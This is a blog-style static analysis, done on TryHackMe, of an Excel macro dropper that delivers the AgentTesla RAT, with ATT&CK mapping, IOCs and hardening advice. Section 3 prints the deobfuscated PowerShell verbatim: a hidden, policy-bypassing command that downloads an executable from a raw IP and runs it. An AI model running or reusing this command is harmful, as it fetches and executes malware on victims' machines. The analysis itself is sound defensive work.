Enes Arda Baydaş

Agent Tesla VBA Dropper

latest post: [Click to go]

3 min read

Static Analysis: Agent Tesla VBA Dropper

Date: 2026-03-02

Author: Enes Arda Baydaş

Category: Malware Analysis

Platform: TryHackMe (Room: RemnuxVM)

MalwareAnalysis_AgentTesla

1. Executive Brief

Scenario:

A suspicious Excel file (agenttesla.xlsm) was flagged for analysis. The objective was to perform static analysis to determine if the file contained malicious code, extract any potential Indicators of Compromise (IOCs), and identify the payload delivery mechanism.

Threat Summary:

The analyzed document acts as an initial access vector and downloader for AgentTesla, a well-known. NET-based Remote Access Trojan (RAT) and information stealer. Execution of the embedded macros initiates a PowerShell sequence that retrieves the AgentTesla payload. A successful infection risks severe credential harvesting and data exfiltration, triggering mandatory breach notifications to the KVKK (Personal Data Protection Authority).

2. The Investigation

Initial Triage & OLE Analysis

The investigation started by checking the OLE streams in the Excel file with oledump.py on a Remnux VM. This tool lets us analyze the binary structure of Office documents without running them.

Ekran görüntüsü 2026-03-02 195751

Observation: The output showed Stream A3 and A4, marked with m and M, indicating VBA Macros. Stream A4 (‘VBA/ThisWorkbook’) was chosen for closer inspection because of its size and location.

Macro Extraction & Code Analysis

Stream A4 was decompressed using the -s 4 --vbadecompress flags. Analysis of the Workbook_Open() function revealed a heavily obfuscated variable (Sqtnew). The string utilized caret (^) and asterisk (*) characters to break the command signature, a standard defense evasion technique designed to bypass static string matching.

Ekran görüntüsü 2026-03-02 195536

The obfuscated string was processed through CyberChef using a “Find / Replace” recipe to strip the junk characters (^, *, ,). This revealed the underlying PowerShell command executing via Net.WebClient to download a secondary executable from a remote staging server.

3. Findings & Artifacts

The deobfuscated PowerShell script revealed the following behavior and IOCs:

Script Logic:

powershell -WindowStyle hidden -executionpolicy bypass;
$TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } -PassThru;
Invoke-WebRequest -Uri "http://193.203.203.67/rt/Doc-3737122pdf.exe" -OutFile $TempFile;
Start-Process $TempFile;

MITRE ATT&CK Mapping (TTPs)

TacticTechnique IDTechnique NameContext
Initial AccessT1566.001Phishing: Spearphishing AttachmentDelivery via malicious .xlsm file.
ExecutionT1204.002User Execution: Malicious FileRequires user to enable macros.
ExecutionT1059.001Command and Scripting Interpreter: PowerShellExecutes payload retrieval script.
Defense EvasionT1027Obfuscated Files or InformationVBA string obfuscation (^, *).

Indicators of Compromise (IOCs):

TypeIndicatorContext
File Nameagenttesla.xlsmInitial delivery vector.
IPv4 Address193[.]203[.]203[.]67Remote staging server.
URLhxxp://193[.]203[.]203[.]67/rt/Doc-3737122pdf[.]exePayload download location.
File NameDoc-3737122pdf.exeDropped AgentTesla payload.
File Path%TEMP%Execution directory.

4. Remediation & Hardening

Immediate Actions:

  1. Network Block: Add the IP 193[.]203[.]203[.]67 to the firewall and web proxy blocklists right away.
  2. Threat Intelligence: Report the malicious IP to USOM (Ulusal Siber Olaylara Müdahale Merkezi) for national threat sharing.
  3. Endpoint Scan: Check the SIEM/EDR for endpoints that recently connected with this IP or ran Doc-3737122pdf.exe.

System Hardening:

  1. Macro Security: Enforce Group Policy Objects (GPO) to “Block macros from running in Office files from the Internet” (Mark of the Web).
  2. PowerShell Restriction: Limit PowerShell execution to Signed Scripts only, where possible for general users.

5. Reflections

  • Initial triage demonstrated that simply identifying the presence of a macro is insufficient; tracing the execution flow to the command string assembly is critical.

  • The reliance on simple character substitution for evasion highlights the necessity of thorough string analysis.

  • Future workflows will prioritize early identification of anomalous character clustering (^, *) during VBA static analysis.